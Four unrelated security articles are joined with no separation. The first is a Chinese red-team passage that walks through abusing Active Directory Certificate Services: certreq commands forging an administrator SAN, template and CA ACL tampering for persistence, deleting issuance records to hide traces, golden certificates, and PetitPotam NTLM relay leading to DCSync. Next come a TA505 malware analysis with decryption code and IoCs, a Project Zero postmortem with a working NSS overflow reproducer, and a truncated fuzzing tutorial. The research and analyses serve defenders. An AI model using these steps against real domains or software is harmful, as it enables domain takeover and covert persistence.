可看到证书颁发给了 administrator
EDITF_ATTRIBUTESUBJECTALTNAME2 滥用
一些企业因业务需求会把颁发 CA + EDITF_ATTRIBUTESUBJECTALTNAME2
来启用 SAN (主题备用名),从而允许用户在申请证书时说明自己身份。例如 CBA for Azure AD 场景中证书通过 NDES 分发到移动设备,用户需要使用 RFC 名称或主体名称作为 SAN 扩展名来声明自己的身份。
至此利用手段与第一种一样均可伪造身份,区别在于一个是证书属性,一个是证书扩展。
- 企业CA授予低权限用户请求权限(默认)
- 模板中CA管理员审批未启用(默认)
- 模板中不需要授权的签名(默认)
- CA +EDITF_ATTRIBUTESUBJECTALTNAME2
通过远程注册表判断 CA 是否开启 SAN 标识
certutil -config "CA01.corp.qihoo.cn\corp-CA01-CA" -getreg "policy\EditFlags"
手动创建利用证书请求
certreq –new usercert.inf certrequest.req
#usercert.inf
[NewRequest]
KeyLength=2048
KeySpec=1
RequestType = PKCS10
Exportable = TRUE
ExportableEncrypted = TRUE
[RequestAttributes]
CertificateTemplate=USER
利用 req 请求上步得到 .cer 含公钥证书,其他字段可翻阅官方文档
certreq -submit -config "CA01.corp.qihoo.cn\corp-CA01-CA" -attrib "SAN:[email protected]" certrequest.req certrequest.cer
将 .cer 导入机器后连同私钥导出为 .pfx ,同样顺利通过 ptt 认证。
2. 访问权限
前面提到,证书模板和证书颁发机构是 AD 中的安全对象,这意味着安全描述符同样可用来指定哪些主体对他们具有特定的权限,详细内容可阅读 ACL 相关文档。
在对应设置中安全选项可用于对用户的权限进行相关设置,我们关注5种权限
权限 | 描述 |
---|---|
Owner | 对象所有人,可以编辑任何属性 |
Full Control | 完全控制对象,可以编辑任何属性 |
WriteOwner | 允许委托人修改对象的安全描述符的所有者部分 |
WriteDacl | 可以修改访问控制 |
WriteProperty | 可以编辑任何属性 |
模板访问权限配置错误
例如我们已经拿下整个域想借助证书模板进行权限维持,那我们可对一个无害正常模板进行相关 ACL 添加
- NT AUTHORITY\Authenticated Users -> WriteDacl
- NT AUTHORITY\Authenticated Users -> WriteProperty
当我们重新回到域内通过密码喷洒等手段再次拿到任意一个用户凭据后,即可将该无害模板变成我们可以利用的提权模板
- msPKI-Certificates-Name-Flag -edit-> ENROLLEE_SUPPLIES_SUBJECT (WriteProperty)
- msPKI-Certificate-Application-Policy -add-> 服务器身份验证 (WriteProperty)
- mspki-enrollment-flag -edit-> AUTO_ENROLLMENT (WriteProperty)
- Enrollment Rights -add-> Control User (WriteDacl)
随后利用恶意模板进行 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 提权利用,可拿到 administrator 的证书凭据即可 ptt ,相比 Certify ,certi 是可以在域外使用的。
PKI 访问权限配置错误
如果低特权的攻击者可以对 CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=
控制,那么攻击者就会直接控制 PKI 系统 (证书模板容器、证书颁发机构容器、NTAuthCertificates对象、注册服务容器等)。
将 CN=Public Key Services,CN=Services,CN=Configuration
添加 CORP\zhangsan 用户对其 GenericAll 的权限
此时我们可以滥用权限创建一个新的恶意证书模板来使用进行前面相关的域权限提升方法。
CA 访问权限配置错误
CA 本身具有一组安全权限用于权限管理
我们主要关注 ManageCA ,ManageCertificates 两种权限
权限 | 描述 |
---|---|
Read | 读取 CA |
ManageCA | CA 管理员 |
Issue and manage certificates | 证书管理 |
Request certificates | 请求证书,默认拥有 |
利用面一:隐藏 CA 申请记录
在拿到域管权限或拥有 PKI 操作权限后创建一个恶意证书模板
使用 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 姿势获取到 administrator 的 pfx 证书用于权限维持 (用户状态异常无法利用该证书)
我们出于隐蔽考虑可删除模板并利用拥有 ManageCA 权限的 zhangsan 调用 COM 接口 ICertAdminD2::DeleteRow
从 CA 数据库中删除申请的证书痕迹
运维人员是无法从证书控制台观察到我们的证书申请记录并无法吊销证书。只要 administrator 用户不过期,证书不过期即可一直使用,即使用户密码更改。
利用面二:修改 CA 属性用于证书提权
当我们拥有 ManageCA 权限下调用 ICertAdminD2::SetConfigEntry
来修改 CA 的配置数据,例如Config_CA_Accept_Request_Attributes_SAN
的bool型数据从而开启 CA 的 EDITF_ATTRIBUTESUBJECTALTNAME2
此时可参考前面 EDITF_ATTRIBUTESUBJECTALTNAME2 证书提权滥用拿到域控制权
利用面三:自己审批证书注册
在证书模板设置时,部分运维会出于安全考虑将模板发布要求设置为 CA 证书管理员审批,管理员就会在 certsrv.msc
上进行确认
当拥有 ManageCertificates 权限时,可调用 ICertAdminD::ResubmitRequest
去给需要审核的滥用证书进行批准放行。
3. 其他利用
Golden Certificates
使用偷来的证书颁发机构 (CA) 证书以及私钥来为任意用户伪造证书,这些用户可以对活动目录进行身份验证,因为签署颁发证书的唯一密钥就是 CA 的私钥。
当我们获取到 CA 服务器时,通过 mimikatz 或 SharpDPAPI 项目提取任何不受硬件保护的 CA 证书私钥。
SharpDPAPI4.exe certificates /machine
使用 openssl 转化格式后,利用 ForgeCert 或 pyForgeCert 进行证书构造,故含私钥的 CA 为“黄金证书”。
NTLM Relay to ADCS HTTP Endpoints
该利用方式是因为 http 的证书注册接口易受 NTLM Relay 攻击所导致的。NTLM 相关利用文章有很多,例如 CVE-2018-8581、CVE-2019-1040、Printerbug 等这里不再介绍。
PetitPotam 可以指定域内的一台服务器,使其对指定目标进行身份验证。当目标为低版本 (16以下) 时,可以做到匿名触发。
通过调用 MS-EFSRPC
相关函数到域控,使域控发送请求我们的监听,我们将获取到的 NTLM Relay 到 ADCS 的 Web 注册页面。
通过域控机器用户 NTLM 凭据向 web 服务注册证书,成功得到域控机器账户的Encode Base64 证书。
利用 kekeo 进行 ask tgt 成功拿到 DC$ 权限进行 Dcsync。
0x04 写在后面
ADCS 相关利用手段在实战场景中权限提升,权限维持非常便捷。针对 ADCS 的防御方案在白皮书也有详细提到,这里就不详细写了。
部分解决方案有提到微软的三层架构:
核心思想就是你是什么用户就访问怎样的资产,无法向下级访问且向上访问会告警。那么 CA 、ADCS 服务器的本地管理员组、PKI 和证书模板所拥有者都应该处于0层。
最后灵腾实验室长期招聘高级攻防专家,高级安全研究员,感兴趣可发送简历至g-linton-lab[AT]360.cn
0x05 参考链接
https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf
Tracking a P2P network related to TA505
This post is by Nikolaos Pantazopoulos and Michael Sandee
tl;dr – Executive Summary
For the past few months NCC Group has been closely tracking the operations of TA505 and the development of their various projects (e.g. Clop). During this research we encountered a number of binary files that we have attributed to the developer(s) of ‘Grace’ (i.e. FlawedGrace). These included a remote administration tool (RAT) used exclusively by TA505. The identified binary files are capable of communicating with each other through a peer-to-peer (P2P) network via UDP. While there does not appear to be a direct interaction between the identified samples and a host infected by ‘Grace’, we believe with medium to high confidence that there is a connection to the developer(s) of ‘Grace’ and the identified binaries.
In summary, we found the following:
- P2P binary files, which are downloaded along with other Necurs components (signed drivers, block lists)
- P2P binary files, which transfer certain information (records) between nodes
- Based on the network IDs of the identified samples, there seem to be at least three different networks running
- The programming style and dropped file formats match the development standards of ‘Grace’
History of TA505’s Shift to Ransomware Operations
2014: Emergence as a group
The threat actor, often referred to as TA505 publicly, has been distinguished as an independent threat actor by NCC Group since 2014. Internally we used the name “Dridex RAT group”. Initially it was a group that integrated quite closely with EvilCorp, utilising their Dridex banking malware platform to execute relatively advanced attacks, using often custom made tools for a single purpose and repurposing commonly available tools such as ‘Ammyy Admin’ and ‘RMS’/’RUT’ to complement their arsenal. The attacks performed mostly consisted of compromising organisations and social engineering victims to execute high value bank transfers to corporate mule accounts. These operations included social engineering correctly implemented two-factor authentication with dual authorization by both the creator of a transaction and the authorizee.
2017: Evolution
Late 2017, EvilCorp and TA505 (Dridex RAT Group) split as a partnership. Our hypothesis is that EvilCorp had started to use the Bitpaymer ransomware to extort organisations rather than doing banking fraud. This built on the fact they had already been using the Locky ransomware previously and was attracting unwanted attention. EvilCorp’s ability to execute enterprise ransomware across large-scale businesses was first demonstrated in May 2017. Their capability and success at pulling off such attacks stemmed from the numerous years of experience in compromising corporate networks for banking fraud activity, specifically moving laterally to separate hosts controlled by employees who had the required access and control of corporate bank accounts. The same techniques in relation to lateral movement and tools (such as Empire, Armitage, Cobalt Strike and Metasploit) enabled EvilCorp to become highly effective in targeted ransomware attacks.
However in 2017 TA505 went on their own path and specifically in 2018 executed a large number of attacks using the tool called ‘Grace’, also known publicly as ‘FlawedGrace’ and ‘GraceWire’. The victims were mostly financial institutions and a large number of the victims were located in Africa, South Asia, and South East Asia with confirmed fraudulent wire transactions and card data theft originating from victims of TA505. The tool ‘Grace’ had some interesting features, and showed some indications that it was originally designed as banking malware which had latterly been repurposed. However, the tool was developed and was used in hundreds of victims worldwide, while remaining relatively unknown to the wider public in its first years of use.
2019: Clop and wider tooling
In early 2019, TA505 started to utilise the Clop ransomware, alongside other tools such as ‘SDBBot’ and ‘ServHelper’, while continuing to use ‘Grace’ up to and including 2021. Today it appears that the group has realised the potential of ransomware operations as a viable business model and the relative ease with which they can extort large sums of money from victims.
The remainder of this post dives deeper into a tool discovered by NCC Group that we believe is related to TA505 and the developer of ‘Grace’. We assess that the identified tool is part of a bigger network, possibly related with Grace infections.
Technical Analysis
The technical analysis we provide below focuses on three components of the execution chain:
- A downloader – Runs as a service (each identified variant has a different name) and downloads the rest of the components along with a target processes/services list that the driver uses while filtering information. Necurs have used similar downloaders in the past.
- A signed driver (both x86 and x64 available) – Filters processes/services in order to avoid detection and/or prevent removal. In addition, it injects the payload into a new process.
- Node tool – Communicates with other nodes in order to transfer victim’s data.
It should be noted that for all above components, different variations were identified. However, the core functionality and purposes remain the same.
Upon execution, the downloader generates a GUID (used as a bot ID) and stores it in the ProgramData
folder under the filename regid.1991-06.com.microsoft.dat
. Any downloaded file is stored temporarily in this directory. In addition, the downloader reads the version of crypt32.dll
in order to determine the version of the operating system.
Next, it contacts the command and control server and downloads the following files:
- t.dat – Expected to contain the string ‘kwREgu73245Nwg7842h’
- p3.dat – P2P Binary. Saved as ‘payload.dll’
- d1c.dat – x86 (signed) Driver
- d2c.dat – x64 (signed) Driver
- bn.dat – List of processes for the driver to filter. Stored as ‘blacknames.txt’
- bs.dat – List of services’ name for the driver to filter. Stored as ‘blacksigns.txt’
- bv.dat – List of files’ version names for the driver to filter. Stored as ‘blackvers.txt’.
- r.dat – List of registry keys for the driver to filter. Stored as ‘registry.txt’
The network communication of the downloader is simple. Firstly, it sends a GET request to the command and control server, downloads and saves on disk the appropriate component. Then, it reads the component from disk and decrypts it (using the RC4 algorithm) with the hardcoded key ‘ABCDF343fderfds21’. After decrypting it, the downloader deletes the file.
Depending on the component type, the downloader stores each of them differently. Any configurations (e.g. list of processes to filter) are stored in registry under the key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
with the value name being the thread ID of the downloader. The data are stored in plaintext with a unique ID value at the start (e.g. 0x20 for the processes list), which is used later by the driver as a communication method.
In addition, in one variant, we detected a reporting mechanism to the command and control server for each step taken. This involves sending a GET request, which includes the generated bot ID along with a status code. The below table summarises each identified request (Table 1).
Request | Description |
/c/p1/dnsc.php?n=%s&in=%s | First parameter is the bot ID and the second is the formatted string (“Version_is_%d.%d_(%d)_%d__ARCH_%d”), which contains operating system info |
/c/p1/dnsc.php?n=%s&sz=DS_%d | First parameter is the bot ID and the second is the downloaded driver’s size |
/c/p1/dnsc.php?n=%s&er=ERR_%d | First parameter is the bot ID and the second is the error code |
/c/p1/dnsc.php?n=%s&c1=1 | The first parameter is the bot ID. Notifies the server that the driver was installed successfully |
/c/p1/dnsc.php?n=%s&c1=1&er=REB_ERR_%d | First parameter is the bot ID and the second is the error code obtained while attempting to shut down the host after finding Windows Defender running |
/c/p1/dnsc.php?n=%s&sz=ErrList_%d_% | First parameter is the bot ID, second parameter is the resulted error code while retrieving the blocklist processes. The third parameter is set to 1. The same command is also issued after downloading the blacklisted services’ names and versions. The only difference is on the third parameter, which is increased to ‘2’ for blacklisted services, ‘3’ for versions and ‘4’ for blacklisted registry keys |
/c/p1/dnsc.php?n=%s&er=PING_ERR_%d | First parameter is the bot ID and the second parameter is the error code obtained during the driver download process |
/c/p1/dnsc.php?n=%s&c1=1&c2=1 | First parameter is the bot ID. Informs the server that the bot is about to start the downloading process. |
/c/p1/dnsc.php?n=%s&c1=1&c2=1&c3=1 | First parameter is the bot ID. Notified the server that the payload (node tool) was downloaded and stored successfully |
Driver Analysis
The downloaded driver is the same one that Necurs uses. It has been analysed publically already [1] but in summary, it does the following.
In the first stage, the driver decrypts shellcode, copies it to a new allocated pool and then executes the payload. Next, the shellcode decrypts and runs (in memory) another driver (stored encrypted in the original file). The decryption algorithm remains the same in both cases:
xor_key = extracted_xor_key
bits = 15
result = b''
for i in range(0,payload_size,4):
data = encrypted[i:i+4]
value = int.from_bytes (data, 'little' )^ xor_key
result += ( _rol(value, bits, 32) ^ xor_key).to_bytes(4,'little')
Eventually, the decrypted driver injects the payload (the P2P binary) into a new process (‘wmiprvse.exe’) and proceeds with the filtering of data.
A notable piece of code of the driver is the strings’ decryption routine, which is also present in recent GraceRAT samples, including the same XOR key (1220A51676E779BD877CBECAC4B9B8696D1A93F32B743A3E6790E40D745693DE58B1DD17F65988BEFE1D6C62D5416B25BB78EF0622B5F8214C6B34E807BAF9AA).
Payload Attribution and Analysis
The identified sample is written in C++ and interacts with other nodes in the network using UDP. We believe that the downloaded binary file is related with TA505 for (at least) the following reasons:
- Same serialisation library
- Same programming style with ‘Grace’ samples
- Similar naming convention in the configuration’s keys with ‘Grace’ samples
- Same output files (dsx), which we have seen in previous TA505 compromises. DSX files have been used by ‘Grace’ operators to store information related with compromised machines.
Initialisation Phase
In the initialisation phase, the sample ensures that the configurations have been loaded and the appropriate folders are created.
All identified samples store their configurations in a resource with name XC
.
ANALYST NOTE: Due to limit visibility of other nodes, we were not able to identify the purpose of each key of the configurations.
The first configuration stores the following settings:
- cx – Parent name
- nid – Node ID. This is used as a network identification method during network communication. If the incoming network packet does not have the same ID then the packet is treated as a packet from a different network and is ignored.
- dgx – Unknown
- exe – Binary mode flag (DLL/EXE)
- key – RSA key to use for verifying a record
- port – UDP port to listen
- va – Parent name. It includes the node IPs to contact.
The second configuration contains the following settings (or metadata as the developer names them):
- meta – Parent name
- app – Unknown. Probably specifies the variant type of the server. The following seem to be supported:
- target (this is the current set value)
- gate
- drop
- control
- mod – Specifies if current binary is the core module.
- bld – Unknown
- api – Unknown
- llr – Unknown
- llt- Unknown
Next, the sample creates a set of folders and files in a directory named ‘target’. These folders are:
- node (folder) – Stores records of other nodes
- trash (folder) – Move files for deletion
- units (folder) – Unknown. Appears to contain PE files, which the core module loads.
- sessions (folder) – Active nodes’ sessions
- units.dsx (file) – List of ‘units’ to load
- probes.dsx (file) – Stores the connected nodes IPs along with other metadata (e.g. connection timestamp, port number)
- net.dsx (file) – Node peer name
- reports.dsx (file) – Used in recent versions only. Unknown purpose.
Network communication
After the initialisation phase has been completed, the sample starts sending UDP requests to a list of IPs in order to register itself into the network and then exchange information.
Every network packet has a header, which has the below structure:
struct Node_Network_Packet_Header
{
BYTE XOR_Key;
BYTE Version; // set to 0x37 ('7')
BYTE Encrypted_node_ID[16]; // XORed with XOR_Key above
BYTE Peer_Name[16]; // Xored with XOR_Key above. Connected peer name
BYTE Command_ID; //Internally called frame type
DWORD Watermark; //XORed with XOR_Key above
DWORD Crc32_Data; //CRC32 of above data
};
When the sample requires adding additional information in a network packet, it uses the below structure:
struct Node_Network_Packet_Payload
{
DWORD Size;
DWORD CRC32_Data;
BYTE Data[Size]; // Xored with same key used in the header packet (XOR_Key)
};
As expected, each network command (Table 2) adds a different set of information in the ‘Data’ field of the above structure but most of the commands follow a similar format. For example, an ‘invitation’ request (Command ID 1) has the structure:
struct Node_Network_Invitation_Packet
{
BYTE CMD_ID;
DWORD Session_Label;
BYTE Invitation_ID[16];
BYTE Node_Peer_Name[16];
WORD Node_Binded_Port;
};
The sample supports a limited set of commands, which have as a primary role to exchange ‘records’ between each other.
Command ID | Description |
1 | Requests to register in the other nodes (‘invitation’ request) |
2 | Adds node IP to the probes list |
3 | Sends a ping request. It includes number of active connections and records |
4 | Sends number of active connections and records in the node |
5 | Adds a new node IP:Port that the remote node will check |
6 | Sends a record ID along with the number of data blocks |
7 | Requests metadata of a record |
8 | Sends metadata of a record |
9 | Requests the data of a record |
10 | Receives data of a record and store them on disk |
ANALYST NOTE: When information, such as record IDs or number of active connections/records, is sent, the binary adds the length of the data followed by the actual data. For example, in case of sending number of active connections and records:
01 05 01 02 01 02
The above is translated as:
2 active connections from a total of 5 with 2 records.
Moreover, when a node receives a request, it sends an echo reply (includes the same packet header) to acknowledge that the request was read. In general, the following types are supported:
- Request type of 0x10 for echo request.
- Request type of 0x07 when sending data, which fit in one packet.
- Request type of 0xD when sending data in multiple packets (size of payload over 1419 bytes).
- Request type 0x21. It exists in the binary but not supported during the network communications.
Record files
As mentioned already, a record has its own sub-folder under the ‘node’ folder with each sub-folder containing the below files:
- m – Metadata of record file
- l – Unknown purpose
- p – Payload data
The metadata file contains a set of information for the record such as the node peer name and the node network ID. Among this information, the keys ‘tag’ and ‘pwd’ appear to be very important too. The ‘tag’ key represents a command (different from table 2 set) that the node will execute once it receives the record. Currently, the binary only supports the command ‘updates’. The payload file (p) keeps the updated content encrypted with the value of key ‘pwd’ being the AES key.
Even though we have not been able yet to capture any network traffic for the above command, we believe that it is used to update the current running core module.
IoCs
Nodes’ IPs
45.142.213[.]139:555
195.123.246[.]14:555
45.129.137[.]237:33964
78.128.112[.]139:33964
145.239.85[.]6:3333
Binaries
SHA-1 | Description |
A21D19EB9A90C6B579BCE8017769F6F58F9DADB1 | P2P Binary |
2F60DE5091AB3A0CE5C8F1A27526EFBA2AD9A5A7 | P2P Binary |
2D694840C0159387482DC9D7E59217CF1E365027 | P2P Binary |
02FFD81484BB92B5689A39ABD2A34D833D655266 | x86 Driver |
B4A9ABCAAADD80F0584C79939E79F07CBDD49657 | x64 Driver |
00B5EBE5E747A842DEC9B3F14F4751452628F1FE | X64 Driver |
22F8704B74CE493C01E61EF31A9E177185852437 | Downloader |
D1B36C9631BCB391BC97A507A92BCE90F687440A | Downloader |
This shouldn't have happened: A vulnerability postmortem
Posted by Tavis Ormandy, Project Zero
Introduction
This is an unusual blog post. I normally write posts to highlight some hidden attack surface or interesting complex vulnerability class. This time, I want to talk about a vulnerability that is neither of those things. The striking thing about this vulnerability is just how simple it is. This should have been caught earlier, and I want to explore why that didn’t happen.
In 2021, all good bugs need a catchy name, so I’m calling this one “BigSig”.
First, let’s take a look at the bug, I’ll explain how I found it and then try to understand why we missed it for so long.
Analysis
Network Security Services (NSS) is Mozilla's widely used, cross-platform cryptography library. When you verify an ASN.1 encoded digital signature, NSS will create a VFYContext structure to store the necessary data. This includes things like the public key, the hash algorithm, and the signature itself.
struct VFYContextStr { SECOidTag hashAlg; /* the hash algorithm */ SECKEYPublicKey *key; union { unsigned char buffer[1]; unsigned char dsasig[DSA_MAX_SIGNATURE_LEN]; unsigned char ecdsasig[2 * MAX_ECKEY_LEN]; unsigned char rsasig[(RSA_MAX_MODULUS_BITS + 7) / 8]; } u; unsigned int pkcs1RSADigestInfoLen; unsigned char *pkcs1RSADigestInfo; void *wincx; void *hashcx; const SECHashObject *hashobj; SECOidTag encAlg; /* enc alg */ PRBool hasSignature; SECItem *params; }; |
Fig 1. The VFYContext structure from NSS. |
The maximum size signature that this structure can handle is whatever the largest union member is, in this case that’s RSA at 2048 bytes. That’s 16384 bits, large enough to accommodate signatures from even the most ridiculously oversized keys.
Okay, but what happens if you just....make a signature that’s bigger than that?
Well, it turns out the answer is memory corruption. Yes, really.
The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data.
The bug is simple to reproduce and affects multiple algorithms. The easiest to demonstrate is RSA-PSS. In fact, just these three commands work:
# We need 16384 bits to fill the buffer, then 32 + 64 + 64 + 64 bits to overflow to hashobj, # which contains function pointers (bigger would work too, but takes longer to generate). $ openssl genpkey -algorithm rsa-pss -pkeyopt rsa_keygen_bits:$((16384 + 32 + 64 + 64 + 64)) -pkeyopt rsa_keygen_primes:5 -out bigsig.key # Generate a self-signed certificate from that key $ openssl req -x509 -new -key bigsig.key -subj "/CN=BigSig" -sha256 -out bigsig.cer # Verify it with NSS... $ vfychain -a bigsig.cer Segmentation fault |
Fig 2. Reproducing the BigSig vulnerability in three easy commands. |
The actual code that does the corruption varies based on the algorithm; here is the code for RSA-PSS. The bug is that there is simply no bounds checking at all; sig and key are arbitrary-length, attacker-controlled blobs, and cx->u is a fixed-size buffer.
case rsaPssKey: sigLen = SECKEY_SignatureLen(key); if (sigLen == 0) { /* error set by SECKEY_SignatureLen */ rv = SECFailure; break; }
if (sig->len != sigLen) { PORT_SetError(SEC_ERROR_BAD_SIGNATURE); rv = SECFailure; break; }
PORT_Memcpy(cx->u.buffer, sig->data, sigLen); break; |
Fig 3. The signature size must match the size of the key, but there are no other limitations. cx->u is a fixed-size buffer, and sig is an arbitrary-length, attacker-controlled blob. |
I think this vulnerability raises a few immediate questions:
- Was this a recent code change or regression that hadn’t been around long enough to be discovered? No, the original code was checked in with ECC support on the 17th October 2003, but wasn't exploitable until some refactoring in June 2012. In 2017, RSA-PSS support was added and made the same error.
- Does this bug require a long time to generate a key that triggers the bug? No, the example above generates a real key and signature, but it can just be garbage as the overflow happens before the signature check. A few kilobytes of A’s works just fine.
- Does reaching the vulnerable code require some complicated state that fuzzers and static analyzers would have difficulty synthesizing, like hashes or checksums? No, it has to be well-formed DER, that’s about it.
- Is this an uncommon code path? No, Firefox does not use this code path for RSA-PSS signatures, but the default entrypoint for certificate verification in NSS, CERT_VerifyCertificate(), is vulnerable.
- Is it specific to the RSA-PSS algorithm? No, it also affects DSA signatures.
- Is it unexploitable, or otherwise limited impact? No, the hashobj member can be clobbered. That object contains function pointers, which are used immediately.
This wasn’t a process failure, the vendor did everything right. Mozilla has a mature, world-class security team. They pioneered bug bounties, invest in memory safety, fuzzing and test coverage.
NSS was one of the very first projects included with oss-fuzz, it was officially supported since at least October 2014. Mozilla also fuzz NSS themselves with libFuzzer, and have contributed their own mutator collection and distilled coverage corpus. There is an extensive testsuite, and nightly ASAN builds.
I'm generally skeptical of static analysis, but this seems like a simple missing bounds check that should be easy to find. Coverity has been monitoring NSS since at least December 2008, and also appears to have failed to discover this.
Until 2015, Google Chrome used NSS, and maintained their own testsuite and fuzzing infrastructure independent of Mozilla. Today, Chrome platforms use BoringSSL, but the NSS port is still maintained.
- Did Mozilla have good test coverage for the vulnerable areas? YES.
- Did Mozilla/chrome/oss-fuzz have relevant inputs in their fuzz corpus? YES.
- Is there a mutator capable of extending ASN1_ITEMs? YES.
- Is this an intra-object overflow, or other form of corruption that ASAN would have difficulty detecting? NO, it's a textbook buffer overflow that ASAN can easily detect.
How did I find the bug?
I've been experimenting with alternative methods for measuring code coverage, to see if any have any practical use in fuzzing. The fuzzer that discovered this vulnerability used a combination of two approaches, stack coverage and object isolation.
Stack Coverage
The most common method of measuring code coverage is block coverage, or edge coverage when source code is available. I’ve been curious if that is always sufficient. For example, consider a simple dispatch table with a combination of trusted and untrusted parameters, as in Fig 4.
#include <stdio.h> #include <string.h> #include <limits.h>
static char buf[128];
void cmd_handler_foo(int a, size_t b) { memset(buf, a, b); } void cmd_handler_bar(int a, size_t b) { cmd_handler_foo('A', sizeof buf); } void cmd_handler_baz(int a, size_t b) { cmd_handler_bar(a, sizeof buf); }
typedef void (* dispatch_t)(int, size_t);
dispatch_t handlers[UCHAR_MAX] = { cmd_handler_foo, cmd_handler_bar, cmd_handler_baz, };
int main(int argc, char **argv) { int cmd;
while ((cmd = getchar()) != EOF) { if (handlers[cmd]) { handlers[cmd](getchar(), getchar()); } } } |
Fig 4. The coverage of command bar is a superset of command foo, so an input containing the latter would be discarded during corpus minimization. There is a vulnerability unreachable via command bar that might never be discovered. Stack coverage would correctly keep both inputs.[1] |
To solve this problem, I’ve been experimenting with monitoring the call stack during execution.
The naive implementation is too slow to be practical, but after a lot of optimization I had come up with a library that was fast enough to be integrated into coverage-guided fuzzing, and was testing how it performed with NSS and other libraries.
Object Isolation
Many data types are constructed from smaller records. PNG files are made of chunks, PDF files are made of streams, ELF files are made of sections, and X.509 certificates are made of ASN.1 TLV items. If a fuzzer has some understanding of the underlying format, it can isolate these records and extract the one(s) causing some new stack trace to be found.
The fuzzer I was using is able to isolate and extract interesting new ASN.1 OIDs, SEQUENCEs, INTEGERs, and so on. Once extracted, it can then randomly combine or insert them into template data. This isn’t really a new idea, but is a new implementation. I'm planning to open source this code in the future.
Do these approaches work?
I wish that I could say that discovering this bug validates my ideas, but I’m not sure it does. I was doing some moderately novel fuzzing, but I see no reason this bug couldn’t have been found earlier with even rudimentary fuzzing techniques.
Lessons Learned
How did extensive, customized fuzzing with impressive coverage metrics fail to discover this bug?
What went wrong
Issue #1 Missing end-to-end testing.
NSS is a modular library. This layered design is reflected in the fuzzing approach, as each component is fuzzed independently. For example, the QuickDER decoder is tested extensively, but the fuzzer simply creates and discards objects and never uses them.
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { char *dest[2048];
for (auto tpl : templates) { PORTCheapArenaPool pool; SECItem buf = {siBuffer, const_cast<unsigned char *>(Data), static_cast<unsigned int>(Size)};
PORT_InitCheapArena(&pool, DER_DEFAULT_CHUNKSIZE); (void)SEC_QuickDERDecodeItem(&pool.arena, dest, tpl, &buf); PORT_DestroyCheapArena(&pool); } |
Fig 5. The QuickDER fuzzer simply creates and discards objects. This verifies the ASN.1 parsing, but not whether other components handle the resulting objects correctly. |
This fuzzer might have produced a SECKEYPublicKey that could have reached the vulnerable code, but as the result was never used to verify a signature, the bug could never be discovered.
Issue #2 Arbitrary size limits.
There is an arbitrary limit of 10000 bytes placed on fuzzed input. There is no such limit within NSS; many structures can exceed this size. This vulnerability demonstrates that errors happen at extremes, so this limit should be chosen thoughtfully.
A reasonable choice might be 224-1 bytes, the largest possible certificate that can be presented by a server during a TLS handshake negotiation.
While NSS might handle objects even larger than this, TLS cannot possibly be involved, reducing the overall severity of any vulnerabilities missed.
Issue #3 Misleading metrics.
All of the NSS fuzzers are represented in combined coverage metrics by oss-fuzz, rather than their individual coverage. This data proved misleading, as the vulnerable code is fuzzed extensively but by fuzzers that could not possibly generate a relevant input.
This is because fuzzers like the tls_server_target use fixed, hardcoded certificates. This exercises code relevant to certificate verification, but only fuzzes TLS messages and protocol state changes.
What Worked
- The design of the mozilla::pkix validation library prevented this bug from being worse than it could have been. Unfortunately it is unused outside of Firefox and Thunderbird.
It’s debatable whether this was just good fortune or not. It seems likely RSA-PSS would eventually be permitted by mozilla::pkix, even though it was not today.
Recommendations
This issue demonstrates that even extremely well-maintained C/C++ can have fatal, trivial mistakes.
Short Term
- Raise the maximum size of ASN.1 objects produced by libFuzzer from 10,000 to 224-1 = 16,777,215 bytes.
- The QuickDER fuzzer should call some relevant APIs with any objects successfully created before destroying them.
- The oss-fuzz code coverage metrics should be divided by fuzzer, not by project.
Solution
This vulnerability is CVE-2021-43527, and is resolved in NSS 3.73.0. If you are a vendor that distributes NSS in your products, you will most likely need to update or backport the patch.
Credits
I would not have been able to find this bug without assistance from my colleagues from Chrome, Ryan Sleevi and David Benjamin, who helped answer my ASN.1 encoding questions and engaged in thoughtful discussion on the topic.
Thanks to the NSS team, who helped triage and analyze the vulnerability.
[1] In this minimal example, a workaround if source was available would be to use a combination of sancov's data-flow instrumentation options, but that also fails on more complex variants.
- Haboob
- Introduction to Dharma - Part 2 - Making Dharma More User-Friendly using WebAssembly as a Case-Study
Introduction to Dharma - Part 2 - Making Dharma More User-Friendly using WebAssembly as a Case-Study
In the first part of our Dharma blogpost, we utilized Dharma to write grammar files to fuzz Adobe Acrobat JavaScript API's. Learning how to generate JavaScript code using Dharma opened a whole new area of research for us. In theory, we can target anything that uses JavaScript. According to the 2020 Stack Overflow Developer Survey, JavaScript sits comfortably in the #1 rank spot of being the most commonly used language in the world:
In this blogpost, we'll focus more on fuzzing WebAssembly API's in Chrome. To start with WebAssembly, we went and read the documentation provided by MDN.
We'll start by walking through the basics and getting familiarized with the idea of WebAssembly and how it works with browsers. WebAssembly helps to resolve many issues by using pre-compiled code that gets executed directly, running at near native speed.
After we had the basic idea of WebAssembly and its uses, we started building some simple applications (Hello World!, Calculator, ..), by doing that, we started to get more comfortable with WebAssembly's APIs, syntax and semantics.
Now we can start thinking about fuzzing WebAssembly.
If we break a WebAssembly Application down, we'll notice that its made of three components:
Pure JavaScript Code.
WebAssembly APIs.
WebAssembly Module.
Since we're trying to fuzz everything under the sun, we'll start with the first two components and then tackle the third one later.
JavaScript & WebAssembly API
This part contains a lot of JavaScript code. We need to pay attention to the syntactical part of the language or we'll end up getting logical and syntax errors that are just a headache to deal with. The best way to minimize errors, and easily generate syntactically (and hopefully logically) correct JavaScript code is using a grammar-based text generation tool, such as Domato or Dharma.
To start, we went to MDN and pulled all the WebAssembly APIs. Then we built a Dharma logic for each API. While doing so, we faced a lot of issues that could slow down or ruin our fuzzer. That said, we'll go over these issues later on in this blog.
To instantiate a WebAssembly module, we have to use WebAssembly.instantiate
function, which takes a module (pre-compiled WebAssembly module) and optionally a buffer, here's how it looks as a JavaScript code:
The process is simple, we will'll have to test-try the code, understand how it works and then build Dharma logics for it. The same process applies to all the APIs. As a result, the function above can be translated to the following in Dharma:
The output should be similar to the following:
What we're trying to achieve is covering all possible arguments for that given function.
On a side note: The complexity and length of the Dharma file dramatically increased ever since we started working on this project. Thus, we decided to give code snippets rather than the whole code for brevity.
Coding Style
We had to follow a certain coding style during our journey in writing Dharma files for WebAssembly for different reasons.
